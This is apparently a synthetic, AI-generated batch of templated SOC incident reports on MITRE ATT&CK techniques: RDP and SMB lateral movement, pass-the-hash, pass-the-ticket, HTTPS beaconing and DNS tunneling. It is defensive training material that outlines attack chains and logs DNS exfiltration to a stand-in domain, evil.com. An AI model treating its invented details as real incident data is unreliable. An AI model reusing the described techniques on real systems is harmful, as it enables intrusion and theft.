Primary Cause: Accounts had “Do not require Kerberos preauthentication” enabled (legacy settings).
Contributing Factors:
Guest WiFi accessible from lobby.
No network segmentation for Guest WiFi.
6. Business Impact:
Operational Impact: None.
Data Exposure: 12 encrypted tickets obtained; passwords rotated.
7. Remediation & Prevention:
Completed Actions:
Preauth enabled.
Passwords rotated.
Attacker blocked.
Technical Controls Enhanced:
Audited and removed all accounts with preauth disabled.
Implemented network segmentation for Guest WiFi.
Enhanced monitoring for AS-REQ without preauth.
8. Conclusion:
An attacker on Guest WiFi performed AS-REP Roasting against 12 accounts with preauthentication disabled, obtaining encrypted tickets. Splunk detected the anomalous AS-REQ patterns, enabling rapid remediation and password rotation.
Closure Rationale: Tickets obtained but invalidated; preauth enabled; passwords rotated; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 12:30 EST
164. T1021.001 – Remote Desktop Protocol (Cisco ISE Detection)
Cisco ISE Alert Details
Alert ID: ISE-RDP-LATERAL-1021-7842 Alert Time: 2024-03-11 16:30:45 EST Severity: HIGH (85/100) Source: Cisco Identity Services Engine (ISE) Rule: “Unusual RDP Connection – Potential Lateral Movement” MITRE ATT&CK: T1021.001 – Remote Services: Remote Desktop Protocol
Alert Details:
Detection: RDP connection from non-admin workstation to critical server
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation)
Destination: 192.168.10.10 (DC-01 – Domain Controller)
User: rpatel@company.com (Engineer – not IT admin)
Time: 16:25-16:30 EST
Protocol: RDP (TCP/3389)
Session Duration: 5 minutes
Contextual Anomalies:
User rpatel has no business need for RDP to DC
Engineering workstations should not connect to domain controllers
Time of day: 16:25 (unusual)
Multiple RDP connections to other servers in last hour:
15:45 – RDP to FILESRV-01 (file server)
16:00 – RDP to SQL-SRV-01 (SQL server)
16:15 – RDP to WEB-SRV-01 (web server)
16:25 – RDP to DC-01 (domain controller)
Detection Logic:
Lateral movement pattern (RDP hopping)
User escalating privileges by accessing more critical systems
Engineer accessing domain controller (highly anomalous)
Pattern matches attacker moving laterally to gain domain admin access
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Cisco ISE alert
ISE Console, AD Logs
Confirmed anomalous RDP connections
2. Source Investigation
Check ENG-WS-045
CrowdStrike Falcon
Host compromised (Cobalt Strike)
3. Immediate Action
Isolate ENG-WS-045
CrowdStrike
Source host quarantined
4. Destination Check
Verify DC-01 status
CrowdStrike Falcon
DC-01 not compromised (yet)
5. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
6. Threat Hunting
Check for other RDP connections
ISE, Splunk
No other anomalous connections found
Jira Incident Report
Ticket: SOC-2024-204 Summary: T1021.001 – RDP Lateral Movement from Compromised Engineering Host to DC Status: RESOLVED Resolution: MALICIOUS – Lateral Movement Stopped Priority: P1 – CRITICAL Labels: T1021, rdp, lateral-movement, cisco-ise, compromised-host Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Identity Services Engine (ISE).
Alert: “Unusual RDP Connection – Potential Lateral Movement”.
Source: ENG-WS-045 (Engineering, IP 192.168.45.78).
Destinations: FILESRV-01, SQL-SRV-01, WEB-SRV-01, DC-01.
User: rpatel@company.com (compromised).
Time: 2024-03-11 16:30 EST.
Technique: MITRE ATT&CK T1021.001 – Remote Services: Remote Desktop Protocol.
2. Technical Analysis:
Attack Chain:
15:00 – rpatel account compromised via phishing
15:15 – Attacker logs into ENG-WS-045 via RDP (from external)
15:30 – Attacker enumerates network, identifies targets
15:45 – RDP to FILESRV-01 (file server)
16:00 – RDP to SQL-SRV-01 (SQL server)
16:15 – RDP to WEB-SRV-01 (web server)
16:25 – RDP to DC-01 (domain controller)
16:30 – ISE detects
Lateral Movement Pattern:
FILESRV-01: Attacker checked for sensitive files (none stolen)
SQL-SRV-01: Attacker enumerated databases (schema only)
WEB-SRV-01: Attacker checked web configs (found no credentials)
DC-01: Attacker attempted to enable WMI for persistence (blocked)
Attacker Intent:
Move laterally to gain access to domain controller
Escalate privileges to domain admin
Establish persistence for ransomware
3. Investigation Findings:
Timeline:
15:00 – Account compromised
15:15 – Attacker logs into ENG-WS-045
15:45-16:25 – RDP hopping
16:30 – Alert
16:32 – SOC investigates
16:33 – ENG-WS-045 isolated
16:34 – rpatel account disabled
Indicators of Compromise (IoCs):
Network:
– RDP from ENG-WS-045 (192.168.45.78) to multiple servers
Account:
– rpatel (compromised)
Host:
– ENG-WS-045 (Cobalt Strike beacon)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045.
Disabled rpatel account.
Reset password.
Verified no compromise on destination servers.
Removed any created persistence.
Network Remediation:
Restricted RDP to DC from specific admin jump hosts only.
Enhanced monitoring for RDP to critical servers.
Host Remediation:
Reimaged ENG-WS-045.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing RDP lateral movement.
Contributing Factors:
No MFA on account.
RDP allowed from any internal host to critical servers.
No network segmentation.
6. Business Impact:
Operational Impact: Engineering host offline; multiple servers accessed.
Data Exposure: No data stolen.
7. Remediation & Prevention:
Completed Actions:
Lateral movement stopped.
Account secured.
Hosts verified clean.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented network segmentation.
Restricted RDP to critical servers.
Enhanced monitoring for RDP connections.
8. Conclusion:
An attacker used a compromised engineering account to perform RDP lateral movement across multiple servers, culminating in an attempt to access the domain controller. ISE detected the anomalous RDP pattern and enabled isolation before domain compromise.
Closure Rationale: Lateral movement stopped; account secured; DC not compromised.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 17:30 EST
165. T1021.002 – SMB/Windows Admin Shares (Zeek Detection)
Zeek Alert Details
Alert ID: ZEEK-SMB-LATERAL-1021-7842 Alert Time: 2024-03-11 10:30:22 EST Severity: HIGH (85/100) Source: Zeek Network Security Monitor Rule: “SMB Admin Share Access – Potential Lateral Movement” MITRE ATT&CK: T1021.002 – Remote Services: SMB/Windows Admin Shares
Alert Details:
Detection: Access to ADMIN$ or C$ shares from non-admin workstation
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 192.168.10.50 (FILESRV-01 – File Server)
Protocol: SMB (TCP/445)
Time: 10:15-10:30 EST
SMB Commands:
10:15:22 – SMB2 Create Request: \\192.168.10.50\ADMIN$ (admin share)
10:15:25 – SMB2 Create Response: SUCCESS
10:15:28 – SMB2 Write: writing \\192.168.10.50\ADMIN$\System32\psexesvc.exe
10:15:35 – SMB2 Create: \\192.168.10.50\C$\Windows\Temp\mimikatz.exe
10:15:42 – SMB2 Write: writing mimikatz.exe
10:16:05 – SMB2 Create: \\192.168.10.50\ADMIN$\System32\tasks\update.ps1
10:16:12 – SMB2 Write: writing update.ps1
10:16:30 – SMB2 Close
File Transfers:
psexesvc.exe (PsExec service) – 124 KB
mimikatz.exe – 1.2 MB
update.ps1 – 4 KB (PowerShell script)
Detection Logic:
Access to ADMIN$ share (requires admin privileges)
Source host is engineering workstation (not IT admin)
Transfer of hacking tools (mimikatz)
PowerShell script for persistence
Pattern matches lateral movement and tool deployment
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zeek alert
Zeek Logs, Splunk
Confirmed SMB admin share access and tool transfer
2. Source Investigation
Check ENG-WS-045
CrowdStrike Falcon
Host compromised (Cobalt Strike)
3. Destination Investigation
Check FILESRV-01
CrowdStrike Falcon
Files transferred but not executed yet
4. Immediate Action
Isolate both hosts
CrowdStrike
Both hosts quarantined
5. File Removal
Delete transferred files
CrowdStrike Live Response
psexesvc.exe, mimikatz.exe, update.ps1 deleted
6. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-205 Summary: T1021.002 – SMB Admin Share Lateral Movement and Tool Transfer Status: RESOLVED Resolution: MALICIOUS – Lateral Movement Stopped, Tools Removed Priority: P2 – MEDIUM Labels: T1021, smb, admin-shares, lateral-movement, zeek, compromised-host Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “SMB Admin Share Access – Potential Lateral Movement”.
Source: ENG-WS-045 (Engineering, compromised).
Destination: FILESRV-01 (File Server).
Activity: Access to ADMIN$, transfer of hacking tools.
Time: 2024-03-11 10:30 EST.
Technique: MITRE ATT&CK T1021.002 – Remote Services: SMB/Windows Admin Shares.
2. Technical Analysis:
Attack Chain:
09:30 – rpatel account compromised
09:45 – Attacker logs into ENG-WS-045
10:00 – Attacker enumerates network, finds FILESRV-01
10:15 – Connects to ADMIN$ share using stolen credentials
10:15-10:25 – Transfers psexesvc.exe, mimikatz.exe, update.ps1
10:25 – Files staged on FILESRV-01
10:30 – Zeek detects
Transferred Files:
psexesvc.exe: PsExec service (for remote execution)
mimikatz.exe: Credential dumping tool
update.ps1: PowerShell script to:
# Check if running as admin
# If yes, download and execute additional payload
# Add persistence via scheduled task
Attacker Intent:
Use FILESRV-01 as a staging point
Later execute tools remotely via PsExec
Dump credentials from file server
Destination Status:
Files transferred but not executed
No compromise of FILESRV-01 yet
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker on ENG-WS-045
10:00 – Reconnaissance
10:15-10:25 – File transfer
10:30 – Alert
10:32 – SOC investigates
10:33 – Both hosts isolated
10:34 – Files deleted
Indicators of Compromise (IoCs):
Network:
– SMB access to \\FILESRV-01\ADMIN$
– File transfers (psexesvc.exe, mimikatz.exe, update.ps1)
Files (on FILESRV-01):
– \\FILESRV-01\ADMIN$\System32\psexesvc.exe (deleted)
– \\FILESRV-01\C$\Windows\Temp\mimikatz.exe (deleted)
– \\FILESRV-01\ADMIN$\System32\tasks\update.ps1 (deleted)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated both ENG-WS-045 and FILESRV-01.
Deleted all transferred files from FILESRV-01.
Disabled rpatel account.
Reset password.
Host Remediation:
Reimaged ENG-WS-045.
Full scan of FILESRV-01 (clean).
Verified no execution occurred.
Network Remediation:
Restricted SMB admin share access to specific admin hosts.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing SMB lateral movement.
Contributing Factors:
No MFA on account.
SMB admin shares accessible from any host.
No network segmentation.
6. Business Impact:
Operational Impact: Two hosts offline for 2 hours.
Data Exposure: Tools staged but not executed.
7. Remediation & Prevention:
Completed Actions:
Lateral movement stopped.
Tools removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted SMB admin share access.
Implemented network segmentation.
Enhanced monitoring for SMB admin share access.
8. Conclusion:
An attacker used a compromised account to access the ADMIN$ share on a file server via SMB, transferring hacking tools for later execution. Zeek detected the anomalous SMB activity, enabling removal of the tools before execution.
Closure Rationale: Lateral movement stopped; tools removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 11:30 EST
End of Batch 33
Ready for your next batch of prompts whenever you are.
Batch 34: Lateral Movement & Command and Control Incident Reports
Here are the next 5 detailed SOC incident reports.
166. T1550.002 – Pass the Hash (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-PASS-HASH-1550-7842 Alert Time: 2024-03-12 09:30:15 EST Severity: CRITICAL (98/100) Source: Microsoft Defender for Identity Rule: “Pass-the-Hash Attack Detected” MITRE ATT&CK: T1550.002 – Use Alternate Authentication Material: Pass the Hash
Alert Details:
Detection: NTLM authentication using hash instead of password (Pass-the-Hash)
Source Host: 192.168.45.78 (ENG-WS-045 – Engineering Workstation) Destination: 192.168.10.20 (FILESRV-02 – File Server) User: rpatel@company.com Time: 09:25 EST
Authentication Details:
Protocol: NTLM (not Kerberos)
Authentication Type: NTLMv2
Hash Present: Yes (passed hash, no password)
Session Key: Derived from hash
Target Service: CIFS (file access)
Anomaly Detection:
User rpatel normally uses Kerberos for authentication
NTLM usage unusual for this user in this context
Source host is engineering workstation (not IT)
Multiple previous failed logins from same source
Pattern matches Pass-the-Hash attack
Additional Context:
rpatel’s account had been flagged for suspicious activity
Host 192.168.45.78 was compromised earlier (Cobalt Strike)
Attacker using stolen hash to move laterally
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify MDI alert
Microsoft Defender for Identity
Confirmed Pass-the-Hash attack
2. Source Investigation
Check ENG-WS-045
CrowdStrike Falcon
Host has active Cobalt Strike beacon
3. Immediate Action
Isolate source host
CrowdStrike
ENG-WS-045 quarantined
4. Account Remediation
Reset rpatel password
Azure AD, AD
Password reset; force logoff
5. Hash Revocation
N/A (hashes reset with password)
–
–
6. Threat Hunting
Check for other Pass-the-Hash activity
MDI, Splunk
No other instances found
Jira Incident Report
Ticket: SOC-2024-206 Summary: T1550.002 – Pass-the-Hash Attack from Compromised Engineering Host Status: RESOLVED Resolution: MALICIOUS – Lateral Movement Blocked Priority: P1 – CRITICAL Labels: T1550, pass-the-hash, lateral-movement, mdi, compromised-host Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Pass-the-Hash Attack Detected”.
Source Host: ENG-WS-045 (Engineering, IP 192.168.45.78).
Target: FILESRV-02 (File Server).
User: rpatel@company.com (compromised).
Time: 2024-03-12 09:30 EST.
Technique: MITRE ATT&CK T1550.002 – Use Alternate Authentication Material: Pass the Hash.
2. Technical Analysis:
Attack Chain:
08:30 – rpatel account compromised via phishing
08:45 – Attacker logs into ENG-WS-045 via RDP
08:50 – Attacker dumps hashes from LSASS using Mimikatz
09:00 – Attacker uses rpatel’s hash to authenticate to FILESRV-02 (Pass-the-Hash)
09:10 – Attacker accesses files on file server
09:25 – MDI detects
Pass-the-Hash Technique:
Attacker obtained NTLM hash of rpatel’s account
Used hash to authenticate without knowing plaintext password
Bypassed need for password
Allowed lateral movement to file server
Compromised Host:
ENG-WS-045 had active Cobalt Strike beacon
Mimikatz used to extract hashes
Multiple hashes stolen (including rpatel)
Successful Lateral Movement:
Attacker accessed \filesrv-02\finance (financial documents)
Viewed 5 files (no download logs)
No data exfiltration detected
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50 – Hash extraction
09:00 – Lateral movement to file server
09:25 – MDI detects
09:27 – SOC investigates
09:28 – ENG-WS-045 isolated
09:29 – rpatel password reset
Indicators of Compromise (IoCs):
Host:
– ENG-WS-045 (compromised)
Account:
– rpatel (hash stolen, password reset)
Tools:
– Mimikatz (SHA256: a1b2c3d4…)
– Cobalt Strike beacon (SHA256: b2c3d4e5…)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Reset rpatel password.
Forced logoff of all active sessions.
Revoked any active tokens.
Host Remediation:
Full forensic analysis.
Cobalt Strike beacon removed.
Host reimaged.
Data Protection:
Reviewed accessed files on file server (5 files, non-sensitive).
No data exfiltration confirmed.
5. Root Cause Analysis:
Primary Cause: User credentials compromised, leading to hash theft and lateral movement.
Contributing Factors:
No MFA on account.
LSASS accessible (no Credential Guard).
Network segmentation insufficient.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: Files viewed but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Host isolated and cleaned.
Password reset.
Hashes invalidated.
Technical Controls Enhanced:
Enabled Credential Guard on all endpoints.
Restricted lateral movement via network segmentation.
Enhanced MDI monitoring for Pass-the-Hash.
8. Conclusion:
An attacker used compromised credentials to dump hashes and perform a Pass-the-Hash attack, moving laterally to a file server. MDI detected the anomalous NTLM authentication and enabled rapid containment.
Closure Rationale: Lateral movement blocked; host cleaned; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-12 10:30 EST
167. T1550.003 – Pass the Ticket (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PASS-TICKET-1550-7842 Alert Time: 2024-03-12 14:15:33 EST Severity: CRITICAL (97/100) Source: CrowdStrike Falcon EDR Rule: “Kerberos Ticket Replay – Potential Pass-the-Ticket” MITRE ATT&CK: T1550.003 – Use Alternate Authentication Material: Pass the Ticket
Alert Details:
Detection: Kerberos ticket from unusual source IP used for authentication
Event Details:
User: kwilson@company.com (Karen Wilson, Finance Manager)
Source IP: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 192.168.10.10 (DC-01 – Domain Controller)
Ticket Type: TGT (Ticket Granting Ticket)
Ticket Issued: 14:00 EST (legitimate from Finance workstation)
Ticket Used: 14:10 EST (from Engineering workstation)
Time: 14:10 EST
Detection Logic:
Ticket originally issued to Finance workstation (192.168.45.112)
Same ticket used from Engineering workstation (impossible travel)
Ticket replay detected (Pass-the-Ticket)
Source host ENG-WS-045 is compromised
Additional Context:
Attacker stole ticket from Finance workstation
Using ticket to impersonate kwilson and access resources
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed Pass-the-Ticket attack
2. Source Investigation
Check ENG-WS-045
CrowdStrike
Host has Cobalt Strike beacon
3. Ticket Source Investigation
Check FIN-WS-112
CrowdStrike
Host also compromised (Mimikatz)
4. Immediate Action
Isolate both hosts
CrowdStrike
Both hosts quarantined
5. Ticket Revocation
Force krbtgt password reset
AD
krbtgt reset (twice) to invalidate all tickets
6. Account Remediation
Reset kwilson password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-207 Summary: T1550.003 – Pass-the-Ticket Attack from Compromised Engineering Host Status: RESOLVED Resolution: MALICIOUS – Tickets Invalidated Priority: P1 – CRITICAL Labels: T1550, pass-the-ticket, kerberos, crowdstrike, lateral-movement Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Kerberos Ticket Replay – Potential Pass-the-Ticket”.
User: kwilson@company.com (Finance Manager).
Original Ticket Location: FIN-WS-112 (Finance).
Ticket Usage Location: ENG-WS-045 (Engineering).
Time: 2024-03-12 14:15 EST.
Technique: MITRE ATT&CK T1550.003 – Use Alternate Authentication Material: Pass the Ticket.
2. Technical Analysis:
Attack Chain:
13:00 – kwilson account compromised (phishing)
13:15 – Attacker logs into FIN-WS-112
13:20 – Attacker uses Mimikatz to extract Kerberos tickets
13:30 – Attacker transfers tickets to ENG-WS-045 (already compromised)
14:00 – Legitimate TGT issued to kwilson (unknowingly)
14:05 – Attacker injects ticket into session on ENG-WS-045
14:10 – Attacker accesses resources as kwilson from engineering host
14:15 – CrowdStrike detects
Pass-the-Ticket Technique:
Attacker extracts TGT from compromised host memory
Injects TGT into another session
Can impersonate user without password or hash
Bypasses MFA (ticket already includes MFA claim)
Attacker Actions Using Ticket:
Accessed \filesrv\finance (file server)
Accessed SQL-SRV-01 (database server)
Attempted to access DC-01 (blocked by policy)
No data exfiltration
Compromised Hosts:
FIN-WS-112 (ticket source)
ENG-WS-045 (ticket usage)
3. Investigation Findings:
Timeline:
13:00 – kwilson account compromised
13:15 – Attacker on FIN-WS-112
13:20-13:30 – Ticket extraction and transfer
14:00 – Legitimate TGT issued
14:05-14:10 – Ticket injection and usage
14:15 – Alert
14:17 – SOC investigates
14:18 – Both hosts isolated
14:20 – krbtgt reset initiated
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\tickets.kirbi (deleted)
Hosts:
– FIN-WS-112 (compromised)
– ENG-WS-045 (compromised)
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated both hosts.
Reset kwilson password.
Reset krbtgt password (twice) to invalidate all tickets.
Forced all users to re-authenticate.
Host Remediation:
Reimaged both hosts.
Enterprise-wide Actions:
All users forced to log out and back in.
5. Root Cause Analysis:
Primary Cause: User credentials compromised, leading to ticket theft.
Contributing Factors:
No MFA on account.
Tickets stored in memory (normal).
Network segmentation insufficient.
6. Business Impact:
Operational Impact: Two hosts offline; all users forced to re-authenticate.
Data Exposure: No data stolen.
7. Remediation & Prevention:
Completed Actions:
Tickets invalidated.
Hosts cleaned.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented Credential Guard.
Enhanced monitoring for ticket anomalies.
8. Conclusion:
An attacker used Pass-the-Ticket to impersonate a finance manager, moving laterally from a compromised finance host to an engineering host. CrowdStrike detected the ticket replay and enabled rapid invalidation via krbtgt reset.
Closure Rationale: Tickets invalidated; hosts cleaned; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-12 15:30 EST
168. T1071.001 – Web Protocols C2 Beaconing (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-C2-WEB-1071-7842 Alert Time: 2024-03-12 11:30:22 EST Severity: HIGH (85/100) Source: Zscaler Internet Access (ZIA) Rule: “Beaconing to Suspicious Domain – Potential C2” MITRE ATT&CK: T1071.001 – Application Layer Protocol: Web Protocols
Alert Details:
Detection: Periodic HTTPS connections to suspicious domain (beaconing)
User: alexchen@company.com (Alex Chen, Engineer) Source IP: 192.168.45.78 (ENG-WS-045) Destination: https://cdn-update-service[.]com/api/check Time: 11:15-11:30 EST
Traffic Pattern:
11:15:22 – HTTPS GET /api/check (208 bytes response)
11:20:22 – HTTPS GET /api/check (208 bytes response)
11:25:22 – HTTPS GET /api/check (208 bytes response)
11:30:22 – HTTPS GET /api/check (208 bytes response)
Domain Analysis:
Domain: cdn-update-service[.]com
Registered: 2024-03-05 (7 days ago)
Registrar: Namecheap (privacy protected)
Hosting IP: 185.143.221[.]89 (Bulgaria)
SSL Certificate: Self-signed (issued to “*.cdn-update-service.com”)
Traffic Analysis:
Beacon interval: Exactly 5 minutes
Response size: Exactly 208 bytes (consistent)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
No referrer (direct request)
Detection Logic:
Beaconing pattern (periodic connections to same domain)
Domain age (7 days) and reputation (malicious)
Response size consistency (208 bytes)
User alexchen has no business need for this domain
Pattern matches C2 beaconing
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler alert
Zscaler Admin Console
Confirmed beaconing to suspicious domain
2. Domain Investigation
Check domain reputation
VirusTotal, Threat Intel
Domain flagged as C2 by 42 vendors
3. Process Investigation
Identify process making connections
CrowdStrike Falcon
svchost.exe with injected code (Cobalt Strike)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block domain and IP
Zscaler, Palo Alto
Domain and IP added to blocklists
6. Malware Removal
Clean infected host
CrowdStrike Live Response
Cobalt Strike beacon removed
Jira Incident Report
Ticket: SOC-2024-208 Summary: T1071.001 – C2 Beaconing to Malicious Domain via HTTPS Status: RESOLVED Resolution: MALICIOUS – C2 Blocked, Host Cleaned Priority: P2 – MEDIUM Labels: T1071, web-protocols, c2, beaconing, zscaler, cobalt-strike Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA).
Alert: “Beaconing to Suspicious Domain – Potential C2”.
User: alexchen@company.com (Engineering Department).
Host: ENG-WS-045.
Domain: cdn-update-service[.]com.
Beacon Interval: 5 minutes.
Time: 2024-03-12 11:30 EST.
Technique: MITRE ATT&CK T1071.001 – Application Layer Protocol: Web Protocols.
2. Technical Analysis:
Attack Chain:
10:30 – alexchen account compromised via phishing
10:45 – Attacker logs into ENG-WS-045
10:50 – Cobalt Strike beacon deployed
11:15 – First beacon to C2
11:15-11:30 – Beaconing every 5 minutes
11:30 – Zscaler detects
C2 Infrastructure:
Domain: cdn-update-service[.]com
IP: 185.143.221[.]89 (Bulgaria)
Port: 443 (HTTPS)
Beacon Interval: 5 minutes (exact)
Response Size: 208 bytes (commands/status)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe
Persistence: Scheduled task “WindowsUpdate”
Capabilities: Remote access, keylogging, file exfiltration
Beacon Activity:
No commands received yet (only check-ins)
No data exfiltration
Beaconing pattern detected early
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – Beacon deployed
11:15-11:30 – Beaconing
11:30 – Zscaler alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Domain: cdn-update-service[.]com
– IP: 185.143.221[.]89
– Beacon interval: 5 minutes
Host:
– svchost.exe (injected)
– Scheduled task: “WindowsUpdate”
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 domain and IP at firewall and Zscaler.
Terminated beacon process.
Removed scheduled task.
Disabled alexchen account.
Reset password.
Host Remediation:
Full scan, removed Cobalt Strike.
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (beaconing only).
7. Remediation & Prevention:
Completed Actions:
C2 blocked.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for beaconing patterns.
8. Conclusion:
An attacker deployed a Cobalt Strike beacon on an engineering workstation, which beaconed to a malicious domain every 5 minutes. Zscaler detected the beaconing pattern and enabled rapid containment before any commands could be executed.
Closure Rationale: C2 blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-12 12:30 EST
169. T1071.004 – DNS C2/Exfiltration (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-DNS-C2-1071-7842 Alert Time: 2024-03-12 16:30:45 EST Severity: HIGH (88/100) Source: ExtraHop Reveal(x) Rule: “DNS Tunneling Detected – Potential C2 or Exfiltration” MITRE ATT&CK: T1071.004 – Application Layer Protocol: DNS
Alert Details:
Detection: High volume of DNS queries with encoded subdomains – DNS tunneling
Source: 192.168.45.78 (ENG-WS-045 – Engineering) DNS Server: 8.8.8.8 (Google DNS) Time: 16:15-16:30 EST
DNS Query Pattern:
16:15:10 – TXT query for a1b2c3d4e5f6.evil.com (response: 247 bytes)
16:15:15 – TXT query for g7h8i9j0k1l2.evil.com (response: 251 bytes)
16:15:20 – TXT query for m3n4o5p6q7r8.evil.com (response: 242 bytes)
… (continuing every 5-10 seconds)
Query Analysis:
Domain: *.evil.com (registered 2024-03-10)
Query Type: TXT (returns text data)
Subdomain lengths: 12-16 characters (random)
Response sizes: 200-300 bytes each
Total queries: 847 in 15 minutes
Total data transferred: ~210 KB (exfiltrated or C2)
Decoded Data Sample (base64 in subdomains):
Subdomain: a1b2c3d4e5f6
Decoded: “UEsDBBQAAAAIAICIF1Yj…” (ZIP header)
Detection Logic:
847 DNS queries in 15 minutes (highly anomalous)
TXT queries with random subdomains (DNS tunneling pattern)
Destination domain suspicious (newly registered)
Response sizes consistent with encoded data
Pattern matches DNS tunneling (C2 or exfiltration)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify ExtraHop alert
ExtraHop Console
Confirmed DNS tunneling activity
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
dnscat2.exe (DNS tunneling tool) running
3. Data Analysis
Decode DNS queries
Base64 decoder
Exfiltrated data: ZIP files with documents
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. DNS Blocking
Block evil.com domain
Cisco Umbrella, Palo Alto
Domain blocked
6. Malware Removal
Clean infected host
CrowdStrike Live Response
dnscat2.exe removed; host reimaged
Jira Incident Report
Ticket: SOC-2024-209 Summary: T1071.004 – DNS Tunneling C2/Exfiltration via dnscat2 Status: RESOLVED Resolution: MALICIOUS – C2 Disrupted, Data Exfiltrated (210 KB) Priority: P2 – MEDIUM Labels: T1071, dns-tunneling, c2, exfiltration, extrahop, dnscat2 Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “DNS Tunneling Detected – Potential C2 or Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Method: DNS tunneling via TXT queries to evil.com.
Data: ~210 KB exfiltrated or C2 traffic.
Time: 2024-03-12 16:30 EST.
Technique: MITRE ATT&CK T1071.004 – Application Layer Protocol: DNS.
2. Technical Analysis:
Attack Chain:
15:30 – rpatel account compromised via phishing
15:45 – Attacker logs into ENG-WS-045
15:50 – Attacker downloads dnscat2.exe (DNS tunneling tool)
15:55 – Attacker collects sensitive files (ZIP archives)
16:00-16:30 – Exfiltration via DNS tunneling
16:30 – ExtraHop detects
DNS Tunneling Tool:
Name: dnscat2.exe
SHA256: a1b2c3d4…
Mechanism: Encodes data in DNS queries (subdomains)
Protocol: DNS over UDP port 53
Server: evil.com (attacker-controlled DNS server)
Exfiltrated Data (210 KB):
Financial reports (2 files) – 95 KB
Customer list (1 file) – 58 KB
Source code snippets (3 files) – 57 KB
Total: 6 files, 210 KB
DNS Query Analysis:
Total Queries: 847 in 15 minutes
Data per Query: ~250 bytes
Total Data: ~210 KB
Domain: evil.com (now blocked)
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
15:50 – dnscat2.exe downloaded
15:55 – Data collection
16:00-16:30 – Exfiltration
16:30 – ExtraHop alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – Domain blocked
Indicators of Compromise (IoCs):
Network:
– Domain: evil.com (blocked)
– DNS pattern: 847 TXT queries in 15 minutes
File:
– C:\Windows\Temp\dnscat2.exe (SHA256: a1b2c3d4…)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045.
Blocked evil.com domain at firewall and DNS.
Terminated dnscat2.exe process.
Deleted dnscat2.exe.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (210 KB, 6 files).
Notified affected data owners.
